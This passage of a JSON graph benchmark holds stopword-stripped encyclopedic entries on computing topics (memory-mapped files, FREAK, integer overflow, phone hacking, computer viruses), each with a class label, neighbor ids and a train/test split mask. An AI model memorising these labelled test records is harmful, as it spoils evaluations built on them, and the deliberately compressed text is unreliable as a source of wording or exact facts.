    "label": 4,
    "text": "Sequence-related_amplified_polymorphism:sequence-related amplified polymorphism sequence related amplified polymorphism srap molecular technique developed g. li c. f. quiros 2001 detecting genetic variation open reading frames orfs genomes plants related organisms",
    "neighbors": [
      1582
    ],
    "mask": "Test"
  },
  {
    "node_id": 7727,
    "label": 2,
    "text": "Magic_Cap:magic cap magic cap short magic communicating applications platform discontinued object-oriented operating system pdas developed general magic tony fadell contributor platform darin adler architect magic cap incorporates room metaphor user navigates room room perform various tasks going home office perform word processing file room clean system files automation based mobile agents office assistant several electronic companies came market magic cap devices notable sony magic link motorola envoy released 1994 none devices commercial successes magic cap operating system includes new mobile agent technology named telescript conceptually agents would carry work orders travel place outside handheld device complete work return device results magic cap devices delivered place agents travel personalink service provided agents little access functionality since agent strictly authorized scope inquiry limited software modules installed personalink servers payload carried agents also hampered slow baud rate modems devices 2400 bit/s authentication/authorization system mobile agents telescript created high coupling device target place result deployment agent-based technology incredibly difficult never reached fruition personalink service shut",
    "neighbors": [
      2179,
      6276,
      11271,
      4364,
      3089,
      10393,
      6301,
      5406,
      4383,
      673,
      3626,
      6827,
      3248,
      7857,
      7991,
      9784,
      1083,
      5824,
      7492,
      11079,
      7246,
      2001,
      4305,
      2259,
      7253,
      3542,
      3162,
      607,
      10080,
      2658,
      8423,
      10215,
      3561,
      10599,
      6763,
      6508,
      2925,
      495,
      2160,
      242,
      1524,
      5369,
      8315,
      8316,
      8829,
      11391
    ],
    "mask": "Test"
  },
  {
    "node_id": 7728,
    "label": 2,
    "text": "Memory-mapped_file:memory-mapped file memory-mapped file segment virtual memory assigned direct byte-for-byte correlation portion file file-like resource resource typically file physically present disk also device shared memory object resource operating system reference file descriptor present correlation file memory space permits applications treat mapped portion primary memory benefit memory mapping file increasing i/o performance especially used large files small files memory-mapped files result waste slack space memory maps always aligned page size mostly 4 kib therefore 5 kib file allocate 8 kib thus 3 kib wasted accessing memory mapped files faster using direct read write operations two reasons firstly system call orders magnitude slower simple change program local memory secondly operating systems memory region mapped actually kernel page cache file cache meaning copies need created user space certain application-level memory-mapped file operations also perform better physical file counterparts applications access update data file directly in-place opposed seeking start file rewriting entire edited contents temporary location since memory-mapped file handled internally pages linear file access seen example flat file data storage configuration files requires disk access new page boundary crossed write larger sections file disk single operation possible benefit memory-mapped files lazy loading thus using small amounts ram even large file trying load entire contents file significantly larger amount memory available cause severe thrashing operating system reads disk memory simultaneously writes pages memory back disk memory-mapping may bypass page file completely also allow smaller page-sized sections loaded data edited similarly demand paging used programs memory mapping process handled virtual memory manager subsystem responsible dealing page file memory mapped files loaded memory one entire page time page size selected operating system maximum performance since page file management one critical elements virtual memory system loading page sized sections file physical memory typically highly optimized system function two types memory-mapped files persisted files associated source file disk data saved source file disk last process finished memory-mapped files suitable working extremely large source files non-persisted files associated file disk last process finished working file data lost files suitable creating shared memory inter-process communications ipc major reason choose memory mapped file i/o performance nevertheless tradeoffs standard i/o approach costly due system call overhead memory copying memory-mapped approach cost minor page faults—when block data loaded page cache yet mapped process virtual memory space circumstances memory mapped file i/o substantially slower standard file i/o another drawback memory-mapped files relates given architecture address space file larger addressable space portions mapped time complicating reading example 32-bit architecture intel ia-32 directly address 4 gib smaller portions files even smaller amount addressable space available individual programs—typically range 2 3 gib depending operating system kernel i/o errors underlying file e.g removable drive unplugged optical media ejected disk full writing etc accessing mapped memory reported application sigsegv/sigbus signals posix execute_in_page_error structured exception windows code accessing mapped memory must prepared handle errors n't normally occur accessing memory hardware architectures mmu support memory-mapped files architectures without mmu operating system copy entire file memory request map made extremely wasteful slow little bit file accessed work files fit available memory perhaps common use memory-mapped file process loader modern operating systems including microsoft windows unix-like systems process started operating system uses memory mapped file bring executable file along loadable modules memory execution memory-mapping systems use technique called demand paging file loaded physical memory subsets one page page actually referenced specific case executable files permits os selectively load portions process image actually need execute another common use memory-mapped files share memory multiple processes modern protected mode operating systems processes generally permitted access memory space allocated use another process program attempt causes invalid page faults segmentation violations number techniques available safely share memory memory-mapped file i/o one popular two applications simultaneously map single physical file memory access memory example microsoft windows operating system provides mechanism applications memory-map shared segment system page file share data via section modern operating systems runtime environments support form memory-mapped file access function mmap creates mapping file given file descriptor starting location file length part posix specification wide variety posix-compliant systems unix linux mac os x openvms support common mechanism memory mapping files microsoft windows operating systems also support group api functions purpose createfilemapping free portable implementations memory-mapped files microsoft windows posix-compliant platforms java programming language provides classes methods access memory mapped files programming language supports memory mapped files standard library std.mmfile module ruby gem library called mmap implements memory-mapped file objects since version 1.6 python included mmap module standard library details module vary according whether host platform windows unix-like perl several modules available memory mapping files cpan sys :mmap file :map microsoft .net runtime p/invoke used use memory mapped files directly windows api managed access p/invoke necessary memory mapped files introduced version 4 runtime see memory-mapped files previous versions third-party libraries provide managed api php supported memory-mapping techniques number native file access functions file_get_contents removed 5.3 see revision log r programming language exists library cran called bigmemory uses boost library provides memory-mapped backed arrays directly r. package ff offers memory-mapped vectors matrices arrays data frames j programming language supported memory mapped files since least 2005 includes support boxed array data single datatype files support loaded 'data/jmf j jdb jd database engines use memory mapped files column stores early day implementation pmap system call dec-20 tops-20 operating system feature used software house system-1022 database system sunos 4 introduced unix mmap permitted programs map files memory two decades release tops-20 pmap windows nt given growable memory-mapped files gmmf since createfilemapping function requires size passed altering file size readily accommodated gmmf api developed use gmmf requires declaring maximum file size grow unused space wasted",
    "neighbors": [
      5380,
      7684,
      8582,
      8966,
      3725,
      6797,
      8080,
      273,
      8976,
      11539,
      5397,
      10774,
      6296,
      11675,
      6813,
      9245,
      3615,
      3235,
      10921,
      5165,
      5677,
      7983,
      1332,
      10292,
      823,
      7351,
      1593,
      3386,
      8379,
      6087,
      5840,
      86,
      10333,
      1247,
      486,
      2281,
      5356,
      5492,
      5754,
      7039
    ],
    "mask": "None"
  },
  {
    "node_id": 7729,
    "label": 4,
    "text": "Web_access_management:web access management web access management wam form identity management controls access web resources providing authentication management policy-based authorizations audit reporting services optional single sign-on convenience authentication management process determining user ’ application ’ identity normally done prompting user name password additional methods authentication also include access tokens generate one-time passwords digital certificates user process identity confirmed policy-based authorization comes play web resource one policies attached say e.g allow internal employees access resource and/or allow members admin group access resource requested resource used look policy policy evaluated user ’ identity user passes policy evaluation she/he granted access resource user fails evaluation access denied authentication authorization policy decision made outcome recorded auditing purposes benefit end user web access management product tie security together benefit administrative staff offer single sign process user logs web resource automatically logged related resources users inconvenienced attempting get authenticated multiple websites throughout course day potentially different user names passwords web access management product record initial authentication provide user cookie acts temporary token authentication protected resources thereby requiring user log web access management products originated late 1990s known single sign five original products hewlett-packard hp icewall sso ca technologies siteminder oblix access manager magnaquest technologies limited iam identity access management novell ichain products simple functional capabilities solved important issue time – share user credentials across multiple domains without forcing user log challenge stemmed fact cookies domain-specific simple way seamlessly transfer user one website another new term became known web access management products added functionality controlling resources web pages user could access addition authenticating three different types architectures comes web access management architectures plug-in web agent proxy tokenization plugins programs installed every web/application server register servers called every request web page intercept request communicate external policy server make policy decisions one benefits plugin agent based architecture highly customized unique needs particular web server one drawbacks different plugin required every web server every platform potentially every version every server technology evolves upgrades agents must distributed compatible evolving host software proxy-based architectures differ web requests routed proxy server back-end web/application servers provide universal integration web servers since common standard protocol http used instead vendor-specific application programming interfaces apis one drawbacks additional hardware usually required run proxy servers tokenization differs user receives token used directly access back-end web/application servers architecture authentication occurs web access management tool data flows around removes network bottlenecks caused proxy-based architectures one drawbacks back-end web/application server must able accept token otherwise web access management tool must designed use common standard protocols solutions like ca siteminder known ca single sign-on offer agent proxy based options including standards based federation maxecurity p2 security employs proxy approach netiq access manager offers hybrid solution consists proxy j2ee agent approaches telegrid smrte employs tokenization approach cases annual maintenance costs dwarf purchase price example policy servers used plugin proxy-based architectures high-end hardware needed order handle workload required run web access management infrastructure centralized administration additional hidden cost customers need hire train staff exclusively manage policy entitlements underlying web applications final hidden cost relates regulatory compliance since web access management similar concept firewall closely aligned application-layer firewall must able handle major audit requirements especially public companies subject sarbanes-oxley act mention bound health insurance portability accountability act pci cpni larger companies spend tremendous amounts time money auditing web access management infrastructures since enforcement points many internal external applications",
    "neighbors": [
      3521,
      6563,
      8998,
      5384,
      7368,
      10673,
      10804,
      4725,
      8471,
      5433
    ],
    "mask": "Test"
  },
  {
    "node_id": 7730,
    "label": 4,
    "text": "Phone_hacking:phone hacking phone hacking practice manipulating gaining unauthorized access mobile phones intercepting telephone calls accessing voicemail messages unauthorized access phone user conversation commonly referred phone tapping term came prominence news international phone hacking scandal alleged cases proved court british tabloid newspaper news world involved interception voicemail messages british royal family public figures murdered schoolgirl named milly dowler although mobile phone users may targeted famous rich powerful whose prize important enough whatever reason devote time resources make concerted attack usually common real risks face unauthorised remote access voicemail systems exposed news international phone hacking scandal possible weaknesses implementations systems telcos pabx systems distant voicemail feature accessed entering password initial greeting played hacker call direct dial number voicemail try use default password guess select call back function enter premium rate number call back pabx calls back premium rate line confirming password hacker stop form hacking call back feature pabx turned strong password used mobile phone voicemail messages may accessed landline telephone entry personal identification number pin service provider commonly sets four digit default pin rarely changed phone owner hacker knows phone number default pin access voicemail messages associated service even default pin known social engineering used reset voicemail pin code default impersonating owner phone call call centre many people also use weak pins easy guess prevent subscribers choosing pins weak password strength mobile phone companies disallow use consecutive repeat digits voicemail pin codes mid-2000s discovered calls emanating handset registered voicemail account would put straight voicemail without need pin hacker could use caller id spoofing impersonate target handset caller id thereby gain access associated voicemail without pin following controversies phone hacking criticism leveled mobile service providers allowed access voicemail without pin many mobile phone companies strengthened default security systems remote access voicemail messages phone settings longer achieved even via default pin example announced august 2011 new wireless subscribers would required enter pin checking voicemail even checking phones t-mobile stated recommends turn voice mail password added security always choice analysis user-selected pin codes suggested ten numbers represent 15 iphone passcodes 1234 0000 common years birth graduation also common choices even four-digit pin randomly selected key space small formula_1 10,000 possibilities making pins significantly easier brute force passwords someone physical access handset secured pin therefore feasibly determine pin short time mobile phone microphones activated remotely security agencies telcos without need physical access long battery removed roving bug feature used law enforcement agencies intelligence services listen nearby conversations techniques phone hacking include tricking mobile phone user downloading malware monitors activity phone bluesnarfing unauthorized access phone via bluetooth flaws implementation gsm encryption algorithm allow passive interception equipment needed available government agencies built freely available parts december 2011 german researcher karsten nohl revealed possible hack mobile phone voice text messages many networks free decryption software available internet blamed mobile phone companies relying outdated encryption techniques 2g system said problem could fixed easily phone hacking form surveillance illegal many countries unless carried lawful interception government agency news international phone hacking scandal private investigator glenn mulcaire found violated regulation investigatory powers act 2000 sentenced six months prison january 2007 renewed controversy phone hacking claims led closure news world july 2011 december 2010 truth caller id act signed united states law making illegal cause caller identification service knowingly transmit misleading inaccurate caller identification information intent defraud cause harm wrongfully obtain anything value",
    "neighbors": [
      1601,
      7556,
      9732,
      297,
      9356,
      8950,
      8313,
      7515
    ],
    "mask": "Test"
  },
  {
    "node_id": 7731,
    "label": 4,
    "text": "William_Coffee:william coffee william coffee 1917-1989 received commendation meritorious civilian service april 1946 role recruiting leading group african-american cryptographers signals intelligence service began career public service civilian conservation corps 1937 1940 soon began working signal intelligence service later known signal security agency despite hired janitor promoted messenger upon promoted assigned task hiring group black cryptologists arlington hall station success composing directing group elevated status previously unreached black cryptologists second world war coffee joined armed forces security agency later became national security agency coffee retired nsa 1972 inducted national security agency cryptologic hall honor 2011",
    "neighbors": [
      7887
    ],
    "mask": "Test"
  },
  {
    "node_id": 7732,
    "label": 9,
    "text": "Format_(Common_Lisp):format common lisp codice_1 function common lisp produce formatted text using format string similar printf format string provides functionality codice_2 allowing user output numbers english apply certain format specifiers certain conditions iterate data structures output tabular format functionally originates mit lisp machine lisp based multics codice_3 example c codice_2 call following using common lisp equivalent another example would print every element list delimited commas done using ~^ directives note list values iterated directly codice_5 commas correctly printed items yet complex example would printing list using customary english phrasing whilst codice_5 somewhat infamous tendency become opaque hard read provides remarkably concise yet powerful syntax specialised common need common lisp format summary table available",
    "neighbors": [
      8262,
      2062,
      5360,
      6772,
      4057
    ],
    "mask": "Test"
  },
  {
    "node_id": 7733,
    "label": 2,
    "text": "Z/VM:z/vm z/vm current version ibm vm family virtual machine operating systems z/vm first released october 2000 remains active use development directly based technology concepts dating back 1960s ibm cp/cms ibm system/360-67 see article history cp/cms historical details z/vm runs ibm system z family computers used support large numbers thousands linux virtual machines see linux z systems october 16 2018 ibm released z/vm version 7.1 requires z/architecture implemented ibm ec12 bc12 later models",
    "neighbors": [
      6150,
      2058,
      3082,
      6675,
      8737,
      7217,
      10803,
      573,
      5697,
      5702,
      7248,
      9829,
      6248,
      6772,
      118,
      2168,
      2172,
      2179,
      10883,
      4238,
      9361,
      9370,
      4255,
      2212,
      7848,
      8879,
      7349,
      2236,
      1219,
      8388,
      6342,
      10438,
      10962,
      1235,
      3816,
      8439,
      3323,
      9468,
      2813,
      5378,
      10508,
      8466,
      789,
      5397,
      284,
      3359,
      8482,
      6438,
      295,
      10537,
      1323,
      7983,
      7477,
      8502,
      9525,
      10040,
      2877,
      318,
      8509,
      11075,
      1359,
      1362,
      7507,
      2910,
      863,
      868,
      3429,
      5492,
      8063,
      6529,
      4996,
      3978,
      7053,
      8077,
      11673,
      6557,
      9635,
      421,
      11184,
      8627,
      7607,
      9655,
      5049,
      5562,
      2519,
      10212,
      1513
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7734,
    "label": 4,
    "text": "Integer_overflow:integer overflow computer programming integer overflow occurs arithmetic operation attempts create numeric value outside range represented given number digits – either larger maximum lower minimum representable value common result overflow least significant representable digits result stored result said wrap around maximum i.e modulo power radix usually two modern computers sometimes ten another radix overflow condition may give results leading unintended behavior particular possibility anticipated overflow compromise program reliability security applications timers clocks wrapping overflow desirable c11 standard states unsigned integers modulo wrapping defined behavior term overflow never applies computation involving unsigned operands never overflow processors like graphics processing units gpus digital signal processors dsps support saturation arithmetic overflowed results would clamped i.e set minimum maximum value representable range rather wrapped around register width processor determines range values represented registers though vast majority computers perform multiple-precision arithmetic operands memory allowing numbers arbitrarily long overflow avoided register width limits sizes numbers operated e.g added subtracted using single instruction per operation typical binary register widths unsigned integers include arithmetic operation produces result larger maximum n-bit integer overflow reduces result modulo n-th power 2 retaining least significant bits result effectively causing wrap around particular multiplying adding two integers may result value unexpectedly small subtracting small integer may cause wrap large positive value example 8-bit integer addition 255 2 results 1 similarly subtraction 0 − 1 results 255 two complement representation −1 wraparound may cause security problems—if overflowed value used number bytes allocate buffer buffer allocated unexpectedly small potentially leading buffer overflow depending usage buffer might turn cause arbitrary code execution variable signed integer type program may make assumption variable always contains positive value integer overflow cause value wrap become negative violates program assumption may lead unexpected behavior example 8-bit integer addition 127 1 results −128 two complement 128 solution particular problem use unsigned integer types values program expects assumes never negative computers two dedicated processor flags check overflow conditions carry flag set result addition subtraction considering operands result unsigned numbers fit given number bits indicates overflow carry borrow significant bit immediately following add carry subtract borrow operation would use contents flag modify register memory location contains higher part multi-word value overflow flag set result operation signed numbers sign one would predict signs operands e.g negative result adding two positive numbers indicates overflow occurred signed result represented two complement form would fit given number bits unsigned type ideal result operation outside types representable range returned result obtained wrapping event commonly defined overflow contrast c11 standard defines event overflow states computation involving unsigned operands never overflow ideal result integer operation outside types representable range returned result obtained clamping event commonly defined saturation usage varies whether saturation overflow eliminate ambiguity terms wrapping overflow saturating overflow used term underflow commonly used floating-point math integer math many references found integer underflow term integer underflow used means ideal result closer minus infinity output type representable value closest minus infinity term integer underflow used definition overflow may include types overflows may include cases ideal result closer positive infinity output type representable value closest positive infinity ideal result operation exact integer meaning overflow ambiguous edge cases consider case ideal result value 127.25 output type maximum representable value 127 overflow defined ideal value outside representable range output type case would classified overflow operations well defined rounding behavior overflow classification may need postponed rounding applied c11 standard defines conversions floating point integer must round toward zero c used convert floating point value 127.25 integer rounding applied first give ideal integer output 127 since rounded integer outputs range c standard would classify conversion overflow several methods handling overflow programming languages implement various mitigation methods accidental overflow ada seed7 certain variants functional languages trigger exception condition overflow python since 2.4 seamlessly converts internal representation number match growth eventually representing codice_1 – whose ability limited available memory run-time overflow detection implementation codice_2 also available c compilers languages native support arbitrary-precision arithmetic type safety python common lisp numbers promoted larger size automatically overflows occur exceptions thrown conditions signaled range constraint exists using languages may thus helpful mitigate issue however languages situations still possible integer overflow occur example explicit optimization code path considered bottleneck profiler case common lisp possible using explicit declaration type-annotate variable machine-size word fixnum lower type safety level zero particular code block java 8 overloaded methods example like throw case overflow computer emergency response team cert developed as-if infinitely ranged air integer model largely automated mechanism eliminate integer overflow truncation c/c++ using run-time error handling computer graphics signal processing typical work data ranges 0 1 −1 1 example grayscale image 0 represents black 1 represents white values in-between represent varying shades gray one operation one may want support brightening image multiplying every pixel constant saturated arithmetic allows one blindly multiply every pixel constant without worrying overflow sticking reasonable outcome pixels larger 1 i.e brighter white become white values darker black become black unanticipated arithmetic overflow fairly common cause program errors overflow bugs may hard discover diagnose may manifest large input data sets less likely used validation tests taking arithmetic mean two numbers adding dividing two done many search algorithms causes error sum although resulting mean large represented hence overflows unhandled arithmetic overflow engine steering software primary cause crash 1996 maiden flight ariane 5 rocket software considered bug-free since used many previous flights used smaller rockets generated lower acceleration ariane 5 frustratingly part software overflow error occurred even required running ariane 5 time caused rocket fail—it launch-regime process smaller predecessor ariane 5 remained software adapted new rocket furthermore actual cause failure flaw engineering specification software dealt overflow detected diagnostic dump bus would connected test equipment software testing development connected rocket steering motors flight data dump drove engine nozzle hard one side put rocket aerodynamic control precipitated rapid breakup air 30 april 2015 federal aviation authority announced order boeing 787 operators reset electrical system periodically avoid integer overflow could lead loss electrical power ram air turbine deployment boeing deployed software update fourth quarter european aviation safety agency followed 4 may 2015 error happens 2³¹ centiseconds 2^31/100/3600/24 days indicating 32-bit signed integer overflow bugs evident computer games arcade game donkey kong impossible advance past level 22 due integer overflow time/bonus game takes level number user multiplies 10 adds 40 reach level 22 time/bonus number 260 large 8-bit 256 value register resets 0 gives remaining 4 time/bonus – short finish level donkey kong jr math trying calculate number 10000 shows first 4 digits overflow cause famous split-screen level pac-man nuclear gandhi civilization also caused far lands minecraft existed infdev development period beta 1.7.3 however later fixed beta 1.8 still exists pocket edition windows 10 edition versions minecraft super nintendo game lamborghini american challenge player cause amount money drop 0 race fined limit remaining money paying fee race glitches integer grants player 65,535,000 would going negative similar glitch occurs player drop negative amount fast travelling without sufficient funds proceeding event player gets robbed currency taken away game attempts take players money away amount 0 player granted 2147482963 game currency microsoft ibm macro assembler masm version 1.00 likely programs built pascal compiler integer overflow signedness error stack setup code prevented running newer dos machines emulators common configurations 512 kb memory program either hangs displays error message exits dos 2014 music video psy gangnam style received many views youtube breached maximum possible viewership number within signed 32-bit integer youtube subsequently amended maximum count 64-bit integer august 2016 casino machine resorts world casino printed prize ticket 42,949,672.76 result overflow bug casino refused pay amount calling malfunction using defense machine clearly stated maximum payout 10,000 prize higher result programming bug iowa supreme court ruled favor casino",
    "neighbors": [
      3462,
      2062,
      1936,
      10644,
      9244,
      7326,
      10658,
      428,
      5677,
      1917,
      1461,
      1474,
      8260,
      8773,
      5837,
      10190,
      9041,
      4562,
      4563,
      4572,
      3039,
      10083,
      6373,
      4071,
      8167,
      10344,
      8554,
      1775,
      1776,
      3956,
      7292,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 7735,
    "label": 4,
    "text": "Minnie_M._Kenny:minnie m. kenny minnie m. kenny 1929–august 17 2005 cryptanalyst educator equal opportunity activist worked national security agency nsa served deputy commandant national cryptologic school responsible creating scholarships nsa employees recipient numerous awards including meritorious exceptional civilian service awards presidential meritorious executive award distinguished service award cia kenny inducted cryptologic hall honor 2009 minnie mcneal born 1929 philadelphia graduating philadelphia high school girls worked philadelphia commerce department united states census bureau washington d. c. hired 1951 work arlington hall army security agency part first group african americans allowed work upstairs operations division basement assigned u street school training training change organization military footing national security agency 1952 mcneal assigned communications clerk allo non-soviet linguistics unit particularly well known expertise cryptanalysis language traffic analysis worked elite think tank nsa develop programs cryptanalysis language serving chair agency language panel 1972 mcneal married herbert cornelius kenny one singers ink spots daughter daphne 1973 kenny became founding editor nsa group b journal dragon seeds pressed cryptanalyst personal computer necessary tool 1975 1981 served office techniques standards nsa chief language linguistics 1980 recipient meritorious civilian service award beginning 1982 kenny served deputy commandant national cryptologic school worked traditional black colleges universities increase diversity introduced computer assisted teaching techniques founded computer assisted learning instruction consortium calico bring professional language teachers use language together international association 1984 kenny awarded second civilian honor exceptional civilian service award nsa presidents ronald reagan george h. w. bush awarded meritorious executive award decade working improve school kenny served department defense congressional task force women minorities handicapped science technology nsa director equal employment opportunity 1993 retirement recipient central intelligence agency distinguished service award kenny served congressional fellow staff congressman louis stokes worked drafting underground railroad act 1997 designed preserve protect history significant buildings associated historic organization kenny died august 17 2005 columbia maryland buried st. john cemetery ellicott city maryland posthumously 2009 inducted cryptologic hall honor",
    "neighbors": [
      1941,
      7887
    ],
    "mask": "Test"
  },
  {
    "node_id": 7736,
    "label": 4,
    "text": "FREAK:freak freak factoring rsa export keys security exploit cryptographic weakness ssl/tls protocols introduced decades earlier compliance u.s. cryptography export regulations involved limiting exportable software use public key pairs rsa moduli 512 bits less so-called rsa_export keys intention allowing broken easily national security agency nsa organizations lesser computing resources however early 2010s increases computing power meant could broken anyone access relatively modest computing resources using well-known number field sieve algorithm using little 100 cloud computing services combined ability man-in-the-middle attack manipulate initial cipher suite negotiation endpoints connection fact finished hash depended master secret meant man-in-the-middle attack modest amount computation could break security website allowed use 512-bit export-grade keys exploit discovered 2015 underlying vulnerabilities present many years dating back 1990s flaw found researchers imdea software institute inria microsoft research freak attack openssl identifier vulnerable software devices included apple safari web browser default browser google android operating system microsoft internet explorer openssl microsoft also stated schannel implementation transport-layer encryption vulnerable version freak attack versions microsoft windows cve id microsoft vulnerability schannel cve id apple vulnerability secure transport sites affected vulnerability included us federal government websites fbi.gov whitehouse.gov nsa.gov around 36 https-using websites tested one security group shown vulnerable exploit based geolocation analysis using ip2location lite 35 vulnerable servers located us press reports exploit described effects potentially catastrophic unintended consequence us government efforts control spread cryptographic technology vendors process releasing new software would fix flaw march 9 2015 apple released security updates ios 8 os x operating systems fixed flaw march 10 2015 microsoft released patch fixed vulnerability supported versions windows server 2003 vista later google chrome 41 opera 28 also mitigated flaw mozilla firefox vulnerable flaw research paper explaining flaw published 36th ieee symposium security privacy awarded distinguished paper award",
    "neighbors": [
      513,
      517,
      1157,
      6023,
      1288,
      8584,
      6797,
      9744,
      1683,
      2709,
      1688,
      3742,
      2083,
      8358,
      11693,
      11569,
      9394,
      9281,
      9412,
      3657,
      5834,
      7887,
      10831,
      11345,
      5590,
      474,
      3805,
      7264,
      4194,
      7139,
      8674,
      10341,
      5107,
      501,
      1526,
      2169,
      3707,
      510,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 7737,
    "label": 8,
    "text": "Diffbot:diffbot diffbot developer machine learning computer vision algorithms public apis extracting data web pages web scraping company founded 2008 stanford university first company funded startx stanford student enterprises stanford on-campus venture capital fund company gained interest application computer vision technology web pages wherein visually parses web page important elements returns structured format 2015 diffbot announced working version automated knowledge graph crawling web using automatic web page extraction build large database structured web data company products allow software developers analyze web home pages article pages extract important information ignoring elements deemed core primary content august 2012 company released page classifier api automatically categorizes web pages specific page types part diffbot analyzed 750,000 web pages shared social media service twitter revealed photos followed articles videos predominant web media shared social network company raised 2 million funding may 2012 investors including andy bechtolsheim sky dayton diffbot customers include adobe aol cisco duckduckgo ebay instapaper microsoft onswipe springpad",
    "neighbors": [
      488,
      113
    ],
    "mask": "Train"
  },
  {
    "node_id": 7738,
    "label": 9,
    "text": "Oriel_(scripting_language):oriel scripting language oriel scripting language released power tools series instructional books written leblond group described documentation graphics-based batch language originally designed microsoft windows 3.0 released book windows 3 power tools 1991 however versions language also bundled windows 3.1 power tools 1992 windows nt power tools 1994 suggested extension oriel script file orl oriel distributed two executables oriel.exe mkruntim.exe former oriel interpreter invoked would prompt user choose script file execution latter gave user ability create custom executables bundling script within copy interpreter way oriel program could distributed run way windows exe language named oriel style bay window window style depicted icon distributed runtime following program displays modal dialog box containing hello world message oriel program always possess main window dialog box type would appear following code gives window title maximizes instructs remain open user closes code also demonstrates retrieval window information use string variables function call setwindow maximize could replace second third lines",
    "neighbors": [
      9345,
      9780,
      6797,
      7983
    ],
    "mask": "None"
  },
  {
    "node_id": 7739,
    "label": 4,
    "text": "Computer_virus:computer virus computer virus type malware executed replicates modifying computer programs inserting code replication succeeds affected areas said infected computer virus virus writers use social engineering deceptions exploit detailed knowledge security vulnerabilities initially infect systems spread virus vast majority viruses target systems running microsoft windows employing variety mechanisms infect new hosts often using complex anti-detection/stealth strategies evade antivirus software motives creating viruses include seeking profit e.g. ransomware desire send political message personal amusement demonstrate vulnerability exists software sabotage denial service simply wish explore cybersecurity issues artificial life evolutionary algorithms computer viruses currently cause billions dollars worth economic damage year due causing system failure wasting computer resources corrupting data increasing maintenance costs stealing personal information etc response free open-source antivirus tools developed industry antivirus software cropped selling freely distributing virus protection users various operating systems even though currently existing antivirus software able uncover computer viruses especially new ones computer security researchers actively searching new ways enable antivirus solutions effectively detect emerging viruses already become widely distributed term virus also misused extension refer types malware malware encompasses computer viruses along many forms malicious software computer worms ransomware spyware adware trojan horses keyloggers rootkits bootkits malicious browser helper object bhos malicious software majority active malware threats actually trojan horse programs computer worms rather computer viruses term computer virus coined fred cohen 1985 misnomer viruses often perform type harmful activity infected host computers acquisition hard disk space central processing unit cpu time accessing private information e.g. credit card numbers corrupting data displaying political humorous messages user screen spamming e-mail contacts logging keystrokes even rendering computer useless however viruses carry destructive payload attempt hide themselves—the defining characteristic viruses self-replicating computer programs modify software without user consent first academic work theory self-replicating computer programs done 1949 john von neumann gave lectures university illinois theory organization complicated automata work von neumann later published theory self-reproducing automata essay von neumann described computer program could designed reproduce von neumann design self-reproducing computer program considered world first computer virus considered theoretical father computer virology 1972 veith risak directly building von neumann work self-replication published article selbstreproduzierende automaten mit minimaler informationsübertragung self-reproducing automata minimal information exchange article describes fully functional virus written assembler programming language siemens 4004/35 computer system 1980 jürgen kraus wrote diplom thesis selbstreproduktion bei programmen self-reproduction programs university dortmund work kraus postulated computer programs behave way similar biological viruses first known description self-reproducing program short story occurs 1970 story gregory benford describes computer program called virus installed computer telephone modem dialling capability randomly dials phone numbers hit modem answered another computer attempts program answering computer program second computer also begin dialling random numbers search yet another computer program program rapidly spreads exponentially susceptible computers countered second program called vaccine idea explored two 1972 novels harlie one david gerrold terminal man michael crichton became major theme 1975 novel shockwave rider john brunner 1973 michael crichton sci-fi movie westworld made early mention concept computer virus central plot theme causes androids run amok alan oppenheimer character summarizes problem stating ... clear pattern suggests analogy infectious disease process spreading one ... area next replies stated perhaps superficial similarities disease must confess find difficult believe disease machinery creeper virus first detected arpanet forerunner internet early 1970s creeper experimental self-replicating program written bob thomas bbn technologies 1971 creeper used arpanet infect dec pdp-10 computers running tenex operating system creeper gained access via arpanet copied remote system message 'm creeper catch displayed reaper program created delete creeper 1982 program called elk cloner first personal computer virus appear wild —that outside single computer computer lab created written 1981 richard skrenta ninth grader mount lebanon high school near pittsburgh attached apple dos 3.3 operating system spread via floppy disk 50th use elk cloner virus would activated infecting personal computer displaying short poem beginning elk cloner program personality 1984 fred cohen university southern california wrote paper computer viruses – theory experiments first paper explicitly call self-reproducing program virus term introduced cohen mentor leonard adleman 1987 fred cohen published demonstration algorithm perfectly detect possible viruses fred cohen theoretical compression virus example virus malicious software malware putatively benevolent well-intentioned however antivirus professionals accept concept benevolent viruses desired function implemented without involving virus automatic compression instance available windows operating system choice user virus definition make unauthorised changes computer undesirable even damage done intended page one dr solomon virus encyclopaedia undesirability viruses even nothing reproduce thoroughly explained article describes useful virus functionalities published j b. gunn title use virus functions provide virtual apl interpreter user control 1984 first ibm pc virus wild boot sector virus dubbed c brain created 1986 farooq alvi brothers lahore pakistan reportedly deter unauthorized copying software written first virus specifically target microsoft windows winvir discovered april 1992 two years release windows 3.0 virus contain windows api calls instead relying dos interrupts years later february 1996 australian hackers virus-writing crew vlad created bizatch virus also known boza virus first known virus target windows 95 late 1997 encrypted memory-resident stealth virus win32.cabanas released—the first known virus targeted windows nt also able infect windows 3.0 windows 9x hosts even home computers affected viruses first one appear commodore amiga boot sector virus called sca virus detected november 1987 viable computer virus must contain search routine locates new files new disks worthwhile targets infection secondly every computer virus must contain routine copy program search routine locates three main virus parts infection mechanism also called 'infection vector virus spreads propagates virus typically search routine locates new files new disks infection trigger also known logic bomb compiled version could activated time within executable file virus run determines event condition malicious payload activated delivered particular date particular time particular presence another program capacity disk exceeding limit double-click opens particular file payload actual body data performs actual malicious purpose virus payload activity might noticeable e.g. causes system slow freeze time payload harmful activity times non-destructive distributive called virus hoax virus phases life cycle computer virus described using analogy biology life cycle divided four phases virus program idle stage virus program managed access target user computer software stage virus take action virus eventually activated trigger states event execute virus date presence another program file capacity disk exceeding limit user taking certain action e.g. double-clicking certain icon opening e-mail etc. viruses stage virus starts propagating multiplying replicating virus places copy programs certain system areas disk copy may identical propagating version viruses often morph change evade detection professionals anti-virus software infected program contain clone virus enter propagation phase dormant virus moves phase activated perform function intended triggering phase caused variety system events including count number times copy virus made copies actual work virus payload released destructive deleting files disk crashing system corrupting files relatively harmless popping humorous political messages screen computer viruses infect variety different subsystems host computers software one manner classifying viruses analyze whether reside binary executables .exe .com files data files microsoft word documents pdf files boot sector host hard drive combination memory-resident virus simply resident virus installs part operating system executed remains ram time computer booted shut resident viruses overwrite interrupt handling code functions operating system attempts access target file disk sector virus code intercepts request redirects control flow replication module infecting target contrast non-memory-resident virus non-resident virus executed scans disk targets infects exits i.e remain memory done executing many common applications microsoft outlook microsoft word allow macro programs embedded documents emails programs may run automatically document opened macro virus document virus virus written macro language embedded documents users open file virus code executed infect user computer one reasons dangerous open unexpected suspicious 